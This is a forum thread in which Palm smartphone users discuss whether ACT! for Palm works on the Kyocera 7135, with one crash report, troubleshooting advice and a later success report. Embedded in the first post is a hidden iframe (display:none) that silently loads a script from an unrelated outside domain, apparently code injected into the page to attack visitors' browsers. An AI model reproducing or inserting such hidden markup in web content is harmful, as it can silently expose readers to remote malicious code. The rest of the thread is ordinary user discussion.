+ Reply to Thread
    I-300 Novice

ACT! for Palm and 7135--Compatibility Issues

Got my 7135 up and running and downloaded my contact list.

I am having a problem (and I think it is ACT! for Palm related). When I go to check off a task as 'done', the screen goes dark and none of the keys or the stylus function.

I have to soft reset to get it running. Anyone having this problem? Please let me know what you gurus think as far as a solution goes. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

Administrator
    well, ill start off...

do you have any hacks installed? have you done the cold boot and then ONLY installing the ACT client by itself (i.e. not a restore sync) to test it out and see if it works on its on?

Act! for Palm OS compatibilty

Has anyone tried Act! for Palm OS on the 7135? The Device Compatibility Matrix seems to indicate that no Kyocera Palm Smartphones are reccomended, but my reading of the info seems to be that it is more related to sub 33MHz processor speed rather than compatibility, and thus shouldn't be a problem.

If any of you lucky 7135 owners has the ability or wherewithall to try it out, please let me know if you have any success. The free trial is downloadable.

Thanks!

Kevin

Check the Act! discussion forums. The only person who had posted, as of this afternoon was having problems crashing. If he fixes this I'll upgrade to Act! 6 and Act! for Palm OS.

I-300 Novice
    I am using ACT! for Palm on my 7135. So far it is working OK. I just need to figure out how to limit all of the field labels it transfers, as I don't use fields like, 'ticker', 'country', etc.

Let me know how you like it.
    Ahmed V. Ismail
    A Smartphone Addict

Good news! Please post if you get that sorted out. This is going to cost me more money.